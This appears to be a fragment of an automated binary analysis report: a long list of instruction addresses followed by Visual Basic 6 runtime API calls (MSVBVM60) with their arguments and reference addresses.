        0x0040e49a
        0x0040e49a
        0x0040e49f
        0x0040e4a4
        0x0040e4a9
        0x0040e4a9
        0x0040e4d9
        0x0040e4dd
        0x0040e4e2
        0x0040e4fa
        0x0040e500
        0x0040e502
        0x0040e50f
        0x0040e534
        0x0040e511
        0x0040e511
        0x0040e516
        0x0040e51b
        0x0040e521
        0x0040e527
        0x0040e52c
        0x0040e52c
        0x0040e53b
        0x0040e53d
        0x0040e53f
        0x0040e548
        0x0040e549
        0x0040e54e
        0x0040e558
        0x0040e575
        0x0040e55a
        0x0040e55a
        0x0040e55f
        0x0040e564
        0x0040e569
        0x0040e569
        0x0040e599
        0x0040e59d
        0x0040e5a2
        0x0040e5bd
        0x0040e5c0
        0x0040e5c2
        0x0040e5cf
        0x0040e5f1
        0x0040e5d1
        0x0040e5d1
        0x0040e5d3
        0x0040e5d8
        0x0040e5de
        0x0040e5e4
        0x0040e5e9
        0x0040e5e9
        0x0040e5ff
        0x0040e61c
        0x0040e601
        0x0040e601
        0x0040e606
        0x0040e60b
        0x0040e610
        0x0040e610
        0x0040e640
        0x0040e644
        0x0040e649
        0x0040e664
        0x0040e66a
        0x0040e66c
        0x0040e679
        0x0040e69e
        0x0040e67b
        0x0040e67b
        0x0040e680
        0x0040e685
        0x0040e68b
        0x0040e691
        0x0040e696
        0x0040e696
        0x0040e6ac
        0x0040e6c9
        0x0040e6ae
        0x0040e6ae
        0x0040e6b3
        0x0040e6b8
        0x0040e6bd
        0x0040e6bd
        0x0040e6e3
        0x0040e6ed
        0x0040e6f1
        0x0040e6f6
        0x0040e70e
        0x0040e714
        0x0040e716
        0x0040e723
        0x0040e748
        0x0040e725
        0x0040e725
        0x0040e72a
        0x0040e72f
        0x0040e735
        0x0040e73b
        0x0040e740
        0x0040e740
        0x0040e752
        0x0040e758
        0x0040e762
        0x0040e768
        0x0040e778
        0x0040e784
        0x0040e790
        0x0040e796
        0x0040e79d
        0x0040e7a7
        0x0040e7b4
        0x0040e7b5
        0x0040e7b6
        0x0040e7b7
        0x0040e7cb
        0x0040e7d2
        0x0040e7e6
        0x0040e7fa
        0x0040e803
        0x0040e807
        0x0040e80b
        0x0040e80f
        0x0040e813
        0x0040e814
        0x0040e816
        0x0040e824
        0x0040e82b
        0x0040e82f
        0x0040e830
        0x0040e832
        0x0040e837
        0x0040e841
        0x0040e85e
        0x0040e843
        0x0040e843
        0x0040e848
        0x0040e84d
        0x0040e852
        0x0040e852
        0x0040e882
        0x0040e886
        0x0040e88b
        0x0040e8a3
        0x0040e8a6
        0x0040e8a8
        0x0040e8b5
        0x0040e8d7
        0x0040e8b7
        0x0040e8b7
        0x0040e8b9
        0x0040e8be
        0x0040e8c4
        0x0040e8ca
        0x0040e8cf
        0x0040e8cf
        0x0040e8e1
        0x0040e8e7
        0x0040e8f4
        0x0040e8ff
        0x0040e91d
        0x0040e923
        0x0040e930
        0x0040e952
        0x0040e932
        0x0040e932
        0x0040e937
        0x0040e93c
        0x0040e93f
        0x0040e945
        0x0040e94a
        0x0040e94a
        0x0040e95c
        0x0040e964
        0x0040e970
        0x0040e98d
        0x0040e972
        0x0040e972
        0x0040e977
        0x0040e97c
        0x0040e981
        0x0040e981
        0x0040e9b1
        0x0040e9b5
        0x0040e9ba
        0x0040e9d2
        0x0040e9d8
        0x0040e9da
        0x0040e9e7
        0x0040ea0c
        0x0040e9e9
        0x0040e9e9
        0x0040e9ee
        0x0040e9f3
        0x0040e9f9
        0x0040e9ff
        0x0040ea04
        0x0040ea04
        0x0040ea1a
        0x0040ea37
        0x0040ea1c
        0x0040ea1c
        0x0040ea21
        0x0040ea26
        0x0040ea2b
        0x0040ea2b
        0x0040ea5b
        0x0040ea5f
        0x0040ea64
        0x0040ea7c
        0x0040ea7f
        0x0040ea81
        0x0040ea8e
        0x0040eab0
        0x0040ea90
        0x0040ea90
        0x0040ea92
        0x0040ea97
        0x0040ea9d
        0x0040eaa3
        0x0040eaa8
        0x0040eaa8
        0x0040eabe
        0x0040eadb
        0x0040eac0
        0x0040eac0
        0x0040eac5
        0x0040eaca
        0x0040eacf
        0x0040eacf
        0x0040eaff
        0x0040eb03
        0x0040eb08
        0x0040eb23
        0x0040eb26
        0x0040eb28
        0x0040eb35
        0x0040eb57
        0x0040eb37
        0x0040eb37
        0x0040eb39
        0x0040eb3e
        0x0040eb44
        0x0040eb4a
        0x0040eb4f
        0x0040eb4f
        0x0040eb65
        0x0040eb82
        0x0040eb67
        0x0040eb67
        0x0040eb6c
        0x0040eb71
        0x0040eb76
        0x0040eb76
        0x0040eba6
        0x0040ebaa
        0x0040ebaf
        0x0040ebc7
        0x0040ebcd
        0x0040ebcf
        0x0040ebdc
        0x0040ec01
        0x0040ebde
        0x0040ebde
        0x0040ebe3
        0x0040ebe8
        0x0040ebee
        0x0040ebf4
        0x0040ebf9
        0x0040ebf9
        0x0040ec10
        0x0040ec1b
        0x0040ec21
        0x0040ec2e
        0x0040ec34
        0x0040ec3e
        0x0040ec41
        0x0040ec4e
        0x0040ec54
        0x0040ec5e
        0x0040ec61
        0x0040ec87
        0x0040ec91
        0x0040ec92
        0x0040ec93
        0x0040ec94
        0x0040ec9d
        0x0040ecaa
        0x0040ecb1
        0x0040ecb5
        0x0040ecb6
        0x0040ecb8
        0x0040ecc3
        0x0040ecc7
        0x0040eccb
        0x0040eccf
        0x0040ecd0
        0x0040ecd2
        0x0040ece0
        0x0040ece7
        0x0040eceb
        0x0040ecec
        0x0040ecee
        0x0040ecf3
        0x0040ecfd
        0x0040ed1a
        0x0040ecff
        0x0040ecff
        0x0040ed04
        0x0040ed09
        0x0040ed0e
        0x0040ed0e
        0x0040ed3e
        0x0040ed42
        0x0040ed47
        0x0040ed5f
        0x0040ed65
        0x0040ed67
        0x0040ed74
        0x0040ed99
        0x0040ed76
        0x0040ed76
        0x0040ed7b
        0x0040ed80
        0x0040ed86
        0x0040ed8c
        0x0040ed91
        0x0040ed91
        0x0040eda0
        0x0040eda2
        0x0040eda4
        0x0040edaa
        0x0040edab
        0x0040edb0
        0x0040edba
        0x0040edd7
        0x0040edbc
        0x0040edbc
        0x0040edc1
        0x0040edc6
        0x0040edcb
        0x0040edcb
        0x0040edfb
        0x0040edff
        0x0040ee04
        0x0040ee1f
        0x0040ee25
        0x0040ee27
        0x0040ee34
        0x0040ee59
        0x0040ee36
        0x0040ee36
        0x0040ee3b
        0x0040ee40
        0x0040ee46
        0x0040ee4c
        0x0040ee51
        0x0040ee51
        0x0040ee60
        0x0040ee67
        0x0040ee71
        0x0040ee8f
        0x0040ee93
        0x0040eea6
        0x0040eeac
        0x0040eeb9
        0x0040eedb
        0x0040eebb
        0x0040eebb
        0x0040eec0
        0x0040eec5
        0x0040eec8
        0x0040eece
        0x0040eed3
        0x0040eed3
        0x0040eee5
        0x0040eee9
        0x0040eeed
        0x0040eeee
        0x0040eef0
        0x0040eefe
        0x0040ef02
        0x0040ef03
        0x0040ef05
        0x0040ef0a
        0x0040ef14
        0x0040ef31
        0x0040ef16
        0x0040ef16
        0x0040ef1b
        0x0040ef20
        0x0040ef25
        0x0040ef25
        0x0040ef55
        0x0040ef59
        0x0040ef5e
        0x0040ef79
        0x0040ef7f
        0x0040ef81
        0x0040ef8e
        0x0040efb3
        0x0040ef90
        0x0040ef90
        0x0040ef95
        0x0040ef9a
        0x0040efa0
        0x0040efa6
        0x0040efab
        0x0040efab
        0x0040efc1
        0x0040efde
        0x0040efc3
        0x0040efc3
        0x0040efc8
        0x0040efcd
        0x0040efd2
        0x0040efd2
        0x0040f002
        0x0040f006
        0x0040f00b
        0x0040f026
        0x0040f029
        0x0040f02b
        0x0040f038
        0x0040f05a
        0x0040f03a
        0x0040f03a
        0x0040f03c
        0x0040f041
        0x0040f047
        0x0040f04d
        0x0040f052
        0x0040f052
        0x0040f068
        0x0040f085
        0x0040f06a
        0x0040f06a
        0x0040f06f
        0x0040f074
        0x0040f079
        0x0040f079
        0x0040f0a9
        0x0040f0ad
        0x0040f0b2
        0x0040f0ca
        0x0040f0d0
        0x0040f0d2
        0x0040f0df
        0x0040f104
        0x0040f0e1
        0x0040f0e1
        0x0040f0e6
        0x0040f0eb
        0x0040f0f1
        0x0040f0f7
        0x0040f0fc
        0x0040f0fc
        0x0040f10b
        0x0040f10d
        0x0040f10f
        0x0040f115
        0x0040f116
        0x0040f11b
        0x0040f125
        0x0040f142
        0x0040f127
        0x0040f127
        0x0040f12c
        0x0040f131
        0x0040f136
        0x0040f136
        0x0040f166
        0x0040f16a
        0x0040f16f
        0x0040f18a
        0x0040f18d
        0x0040f18f
        0x0040f19c
        0x0040f1be
        0x0040f19e
        0x0040f19e
        0x0040f1a0
        0x0040f1a5
        0x0040f1ab
        0x0040f1b1
        0x0040f1b6
        0x0040f1b6
        0x0040f1c5
        0x0040f1cf
        0x0040f1e5
        0x0040f1ea
        0x0040f1f4
        0x0040f1fe
        0x0040f208
        0x0040f20c
        0x0040f211
        0x0040f21d
        0x0040f229
        0x0040f23e
        0x0040f24b
        0x0040f24c
        0x0040f24d
        0x0040f24e
        0x0040f24f
        0x0040f25d
        0x0040f27d
        0x0040f299
        0x0040f2ae
        0x0040f2b3
        0x0040f2be
        0x0040f2cb
        0x0040f2e8
        0x0040f2cd
        0x0040f2cd
        0x0040f2d2
        0x0040f2d7
        0x0040f2dc
        0x0040f2dc
        0x0040f30c
        0x0040f310
        0x0040f315
        0x0040f330
        0x0040f336
        0x0040f338
        0x0040f345
        0x0040f36a
        0x0040f347
        0x0040f347
        0x0040f34c
        0x0040f351
        0x0040f357
        0x0040f35d
        0x0040f362
        0x0040f362
        0x0040f378
        0x0040f395
        0x0040f37a
        0x0040f37a
        0x0040f37f
        0x0040f384
        0x0040f389
        0x0040f389
        0x0040f3b9
        0x0040f3bd
        0x0040f3c2
        0x0040f3dd
        0x0040f3e0
        0x0040f3e2
        0x0040f3ef
        0x0040f411
        0x0040f3f1
        0x0040f3f1
        0x0040f3f3
        0x0040f3f8
        0x0040f3fe
        0x0040f404
        0x0040f409
        0x0040f409
        0x0040f41f
        0x0040f43c
        0x0040f421
        0x0040f421
        0x0040f426
        0x0040f42b
        0x0040f430
        0x0040f430
        0x0040f460
        0x0040f464
        0x0040f469
        0x0040f484
        0x0040f48a
        0x0040f48c
        0x0040f499
        0x0040f4be
        0x0040f49b
        0x0040f49b
        0x0040f4a0
        0x0040f4a5
        0x0040f4ab
        0x0040f4b1
        0x0040f4b6
        0x0040f4b6
        0x0040f4c5
        0x0040f4cc
        0x0040f4d9
        0x0040f4e6
        0x0040f50d
        0x0040f516
        0x0040f51a
        0x0040f51e
        0x0040f51f
        0x0040f521
        0x0040f526
        0x0040f52c
        0x0040f538
        0x0040f555
        0x0040f53a
        0x0040f53a
        0x0040f53f
        0x0040f544
        0x0040f549
        0x0040f549
        0x0040f579
        0x0040f57d
        0x0040f582
        0x0040f59d
        0x0040f5a3
        0x0040f5a5
        0x0040f5b2
        0x0040f5d7
        0x0040f5b4
        0x0040f5b4
        0x0040f5b9
        0x0040f5be
        0x0040f5c4
        0x0040f5ca
        0x0040f5cf
        0x0040f5cf
        0x0040f5e5
        0x0040f602
        0x0040f5e7
        0x0040f5e7
        0x0040f5ec
        0x0040f5f1
        0x0040f5f6
        0x0040f5f6
        0x0040f626
        0x0040f62a
        0x0040f62f
        0x0040f64a
        0x0040f64d
        0x0040f64f
        0x0040f65c
        0x0040f67e
        0x0040f65e
        0x0040f65e
        0x0040f660
        0x0040f665
        0x0040f66b
        0x0040f671
        0x0040f676
        0x0040f676
        0x0040f68c
        0x0040f6a9
        0x0040f68e
        0x0040f68e
        0x0040f693
        0x0040f698
        0x0040f69d
        0x0040f69d
        0x0040f6cd
        0x0040f6d1
        0x0040f6d6
        0x0040f6ee
        0x0040f6f1
        0x0040f6f3
        0x0040f700
        0x0040f722
        0x0040f702
        0x0040f702
        0x0040f704
        0x0040f709
        0x0040f70f
        0x0040f715
        0x0040f71a
        0x0040f71a
        0x0040f730
        0x0040f74d
        0x0040f732
        0x0040f732
        0x0040f737
        0x0040f73c
        0x0040f741
        0x0040f741
        0x0040f771
        0x0040f775
        0x0040f77a
        0x0040f795
        0x0040f79b
        0x0040f79d
        0x0040f7aa
        0x0040f7cf
        0x0040f7ac
        0x0040f7ac
        0x0040f7b1
        0x0040f7b6
        0x0040f7bc
        0x0040f7c2
        0x0040f7c7
        0x0040f7c7
        0x0040f7dd
        0x0040f7fa
        0x0040f7df
        0x0040f7df
        0x0040f7e4
        0x0040f7e9
        0x0040f7ee
        0x0040f7ee
        0x0040f81e
        0x0040f822
        0x0040f827
        0x0040f842
        0x0040f848
        0x0040f84a
        0x0040f857
        0x0040f87c
        0x0040f859
        0x0040f859
        0x0040f85e
        0x0040f863
        0x0040f869
        0x0040f86f
        0x0040f874
        0x0040f874
        0x0040f88a
        0x0040f8a7
        0x0040f88c
        0x0040f88c
        0x0040f891
        0x0040f896
        0x0040f89b
        0x0040f89b
        0x0040f8cb
        0x0040f8cf
        0x0040f8d4
        0x0040f8ef
        0x0040f8f5
        0x0040f8f7
        0x0040f904
        0x0040f929
        0x0040f906
        0x0040f906
        0x0040f90b
        0x0040f910
        0x0040f916
        0x0040f91c
        0x0040f921
        0x0040f921
        0x0040f936
        0x0040f943
        0x0040f94d
        0x0040f953
        0x0040f95d
        0x0040f960
        0x0040f96b
        0x0040f977
        0x0040f97a
        0x0040f9a3
        0x0040f9b2
        0x0040f9d2
        0x0040f9d8
        0x0040f9e5
        0x0040fa07
        0x0040f9e7
        0x0040f9e7
        0x0040f9ec
        0x0040f9f1
        0x0040f9f4
        0x0040f9fa
        0x0040f9ff
        0x0040f9ff
        0x0040fa14
        0x0040fa1a
        0x0040fa39
        0x0040fa3e
        0x0040fa44
        0x0040fa58
        0x0040fa5e
        0x0040fa6b
        0x0040fa8d
        0x0040fa6d
        0x0040fa6d
        0x0040fa72
        0x0040fa77
        0x0040fa7a
        0x0040fa80
        0x0040fa85
        0x0040fa85
        0x0040fa9a
        0x0040faa4
        0x0040fac1
        0x0040faa6
        0x0040faa6
        0x0040faab
        0x0040fab0
        0x0040fab5
        0x0040fab5
        0x0040fae5
        0x0040fae9
        0x0040faee
        0x0040fb06
        0x0040fb0c
        0x0040fb0e
        0x0040fb1b
        0x0040fb40
        0x0040fb1d
        0x0040fb1d
        0x0040fb22
        0x0040fb27
        0x0040fb2d
        0x0040fb33
        0x0040fb38
        0x0040fb38
        0x0040fb4a
        0x0040fb50
        0x0040fb5a
        0x0040fb5d
        0x0040fb68
        0x0040fb8d
        0x0040fb98
        0x0040fba5
        0x0040fbac
        0x0040fbb4
        0x0040fbc0
        0x0040fbdd
        0x0040fbc2
        0x0040fbc2
        0x0040fbc7
        0x0040fbcc
        0x0040fbd1
        0x0040fbd1
        0x0040fc01
        0x0040fc05
        0x0040fc0a
        0x0040fc22
        0x0040fc25
        0x0040fc27
        0x0040fc34
        0x0040fc56
        0x0040fc36
        0x0040fc36
        0x0040fc38
        0x0040fc3d
        0x0040fc43
        0x0040fc49
        0x0040fc4e
        0x0040fc4e
        0x0040fc64
        0x0040fc81
        0x0040fc66
        0x0040fc66
        0x0040fc6b
        0x0040fc70
        0x0040fc75
        0x0040fc75
        0x0040fca5
        0x0040fca9
        0x0040fcae
        0x0040fcc9
        0x0040fccc
        0x0040fcce
        0x0040fcdb
        0x0040fcfd
        0x0040fcdd
        0x0040fcdd
        0x0040fcdf
        0x0040fce4
        0x0040fcea
        0x0040fcf0
        0x0040fcf5
        0x0040fcf5
        0x0040fd0b
        0x0040fd28
        0x0040fd0d
        0x0040fd0d
        0x0040fd12
        0x0040fd17
        0x0040fd1c
        0x0040fd1c
        0x0040fd4c
        0x0040fd50
        0x0040fd55
        0x0040fd70
        0x0040fd76
        0x0040fd78
        0x0040fd85
        0x0040fdaa
        0x0040fd87
        0x0040fd87
        0x0040fd8c
        0x0040fd91
        0x0040fd97
        0x0040fd9d
        0x0040fda2
        0x0040fda2
        0x0040fdb8
        0x0040fdd5
        0x0040fdba
        0x0040fdba
        0x0040fdbf
        0x0040fdc4
        0x0040fdc9
        0x0040fdc9
        0x0040fdf9
        0x0040fdfd
        0x0040fe02
        0x0040fe1a
        0x0040fe20
        0x0040fe22
        0x0040fe2f
        0x0040fe54
        0x0040fe31
        0x0040fe31
        0x0040fe36
        0x0040fe3b
        0x0040fe41
        0x0040fe47
        0x0040fe4c
        0x0040fe4c
        0x0040fe5e
        0x0040fe64
        0x0040fe6e
        0x0040fe71
        0x0040fe79
        0x0040fe7f
        0x0040fe89
        0x0040fe8c
        0x0040fe9e
        0x0040fea8
        0x0040feb3
        0x0040fecc
        0x0040fed5
        0x0040fedd
        0x0040fee1
        0x0040fee5
        0x0040fee9
        0x0040feea
        0x0040feec
        0x0040fef1
        0x0040fef7
        0x0040ff03
        0x0040ff20
        0x0040ff05
        0x0040ff05
        0x0040ff0a
        0x0040ff0f
        0x0040ff14
        0x0040ff14
        0x0040ff44
        0x0040ff48
        0x0040ff4d
        0x0040ff65
        0x0040ff6b
        0x0040ff6d
        0x0040ff7a
        0x0040ff9f
        0x0040ff7c
        0x0040ff7c
        0x0040ff81
        0x0040ff86
        0x0040ff8c
        0x0040ff92
        0x0040ff97
        0x0040ff97
        0x0040ffa6
        0x0040ffa8
        0x0040ffaa
        0x0040ffb0
        0x0040ffb1
        0x0040ffb6
        0x0040ffc0
        0x0040ffdd
        0x0040ffc2
        0x0040ffc2
        0x0040ffc7
        0x0040ffcc
        0x0040ffd1
        0x0040ffd1
        0x00410001
        0x00410005
        0x0041000a
        0x00410025
        0x00410028
        0x0041002a
        0x00410037
        0x00410059
        0x00410039
        0x00410039
        0x0041003b
        0x00410040
        0x00410046
        0x0041004c
        0x00410051
        0x00410051
        0x00410067
        0x00410084
        0x00410069
        0x00410069
        0x0041006e
        0x00410073
        0x00410078
        0x00410078
        0x004100a8
        0x004100ac
        0x004100b1
        0x004100cc
        0x004100d2
        0x004100d4
        0x004100e1
        0x00410106
        0x004100e3
        0x004100e3
        0x004100e8
        0x004100ed
        0x004100f3
        0x004100f9
        0x004100fe
        0x004100fe
        0x0041010d
        0x00410116
        0x00410125
        0x00410130
        0x00410133
        0x00410138
        0x00410140
        0x0041015e
        0x00410162
        0x00410174
        0x0041017d
        0x00410194
        0x0041019f
        0x004101ac
        0x004101b2
        0x004101b4
        0x004101c1
        0x004101e3
        0x004101c3
        0x004101c3
        0x004101c8
        0x004101cd
        0x004101d0
        0x004101d6
        0x004101db
        0x004101db
        0x004101ea
        0x004101ea
        0x004101ec
        0x004101f2
        0x0041020b
        0x00410215
        0x00410222
        0x00410228
        0x00410232
        0x0041023f
        0x00410240
        0x00410246
        0x00410247
        0x00410251
        0x00000000
        0x00000000
        0x00410253
        0x0041025d
        0x00410263
        0x0041026a
        0x0041026b
        0x004102d1
        0x004102d6

        APIs
        • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E222
        • #585.MSVBVM60(?,?,?,?,?,?,004012A6), ref: 0040E257
        • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,004012A6), ref: 0040E25C
        • __vbaVarDup.MSVBVM60 ref: 0040E2C6
        • #595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 0040E2E6
        • __vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 0040E306
        • __vbaNew2.MSVBVM60(00402AA4,00415010,?,?,?,?,?,?,004012A6), ref: 0040E321
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E35A
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034EC,00000168), ref: 0040E3A4
        • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040E3C3
        • __vbaI4Var.MSVBVM60(?,?,?,?,004012A6), ref: 0040E3F3
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401190,00403360,000006F8), ref: 0040E451
        • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040E481
        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,004012A6), ref: 0040E48C
        • __vbaNew2.MSVBVM60(00402AA4,00415010,?,?,?,?,?,?,004012A6), ref: 0040E4A4
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E4DD
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034EC,00000158), ref: 0040E527
        • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040E549
        • __vbaNew2.MSVBVM60(00402AA4,00415010,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040E564
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E59D
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,00000068), ref: 0040E5E4
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040E60B
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E644
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,00000080), ref: 0040E691
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040E6B8
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E6F1
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040350C,00000120), ref: 0040E73B
        • __vbaChkstk.MSVBVM60(00000000,?,0040350C,00000120), ref: 0040E7A7
        • __vbaI4Var.MSVBVM60(?,?,00518F5D,?), ref: 0040E7D2
        • __vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,?,00000000,?,?,00518F5D,?), ref: 0040E816
        • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0040E832
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040E84D
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E886
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034EC,00000050), ref: 0040E8CA
        • __vbaStrMove.MSVBVM60(00000000,?,004034EC,00000050), ref: 0040E8F4
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401190,00403360,000006FC), ref: 0040E945
        • __vbaFreeStr.MSVBVM60(00000000,00401190,00403360,000006FC), ref: 0040E95C
        • __vbaFreeObj.MSVBVM60(00000000,00401190,00403360,000006FC), ref: 0040E964
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040E97C
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E9B5
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040350C,00000120), ref: 0040E9FF
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040EA26
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EA5F
        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034EC,00000048), ref: 0040EAA3
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040EACA
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EB03
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040350C,00000068), ref: 0040EB4A
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040EB71
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EBAA
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,000000E8), ref: 0040EBF4
        • __vbaStrCopy.MSVBVM60(00000000,?,004034FC,000000E8), ref: 0040EC10
        • __vbaChkstk.MSVBVM60(00000008,00000003,?,?,?), ref: 0040EC87
        • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040ECB8
        • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0040ECD2
        • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0040ECEE
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040ED09
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040ED42
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034EC,00000158), ref: 0040ED8C
        • __vbaLateIdCallLd.MSVBVM60(?,00000000,00000000,00000000), ref: 0040EDAB
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040EDC6
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EDFF
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,000000D8), ref: 0040EE4C
        • __vbaI4Var.MSVBVM60(?,00551AAB,?,00000003), ref: 0040EE93
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401190,00403360,00000700), ref: 0040EECE
        • __vbaFreeObjList.MSVBVM60(00000003,?,?,00000000), ref: 0040EEF0
        • __vbaFreeVarList.MSVBVM60(00000002,?,00000003), ref: 0040EF05
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040EF20
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EF59
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040350C,00000088), ref: 0040EFA6
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040EFCD
        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040F006
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,00000068), ref: 0040F04D
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040F074
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F0AD
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034EC,00000160), ref: 0040F0F7
        • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040F116
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040F131
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F16A
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034EC,00000070), ref: 0040F1B1
        • __vbaVarDup.MSVBVM60(00000000,?,004034EC,00000070), ref: 0040F1E5
        • __vbaI4Var.MSVBVM60(?), ref: 0040F20C
        • __vbaChkstk.MSVBVM60(00000003,swarthmore,?), ref: 0040F23E
        • __vbaFreeObjList.MSVBVM60(00000005,?,00000000,?,?,?,?,I ,00000003,swarthmore,?), ref: 0040F299
        • __vbaFreeVarList.MSVBVM60(00000002,?,00000003), ref: 0040F2AE
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040F2D7
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F310
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034EC,00000178), ref: 0040F35D
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040F384
        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040F3BD
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040350C,00000070), ref: 0040F404
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040F42B
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F464
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034EC,00000180), ref: 0040F4B1
        • __vbaFreeObjList.MSVBVM60(00000003,?,00000000,?), ref: 0040F521
        • __vbaFreeVar.MSVBVM60 ref: 0040F52C
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040F544
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F57D
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,00000170), ref: 0040F5CA
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040F5F1
        • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040F62A
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,00000078), ref: 0040F671
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040F698
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F6D1
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034EC,00000050), ref: 0040F715
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040F73C
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F775
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,00000130), ref: 0040F7C2
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040F7E9
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F822
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,000001E8), ref: 0040F86F
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040F896
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040F8CF
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004034FC,00000178), ref: 0040F91C
        • __vbaStrMove.MSVBVM60(00000000,?,004034FC,00000178), ref: 0040F960
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401190,00403360,00000704,?,?,?,?,?,?,?,?), ref: 0040F9FA
        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0040FA1A
        • __vbaFreeObjList.MSVBVM60(00000006,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040FA39
        • __vbaFreeVar.MSVBVM60 ref: 0040FA44
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401190,00403360,00000708), ref: 0040FA80
        • __vbaNew2.MSVBVM60(00402AA4,00415010), ref: 0040FAB0
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FAE9
        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004034FC,00000198), ref: 0040FB33
        • __vbaStrMove.MSVBVM60(00000000,00000000,004034FC,00000198), ref: 0040FB5D
        • __vbaFreeStr.MSVBVM60(?,?,?,003C314E,?,?), ref: 0040FBAC
        • __vbaFreeObj.MSVBVM60(?,?,?,003C314E,?,?), ref: 0040FBB4
        • __vbaNew2.MSVBVM60(00402AA4,00415010,?,?,?,003C314E,?,?), ref: 0040FBCC
        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,003C314E,?,?), ref: 0040FC05
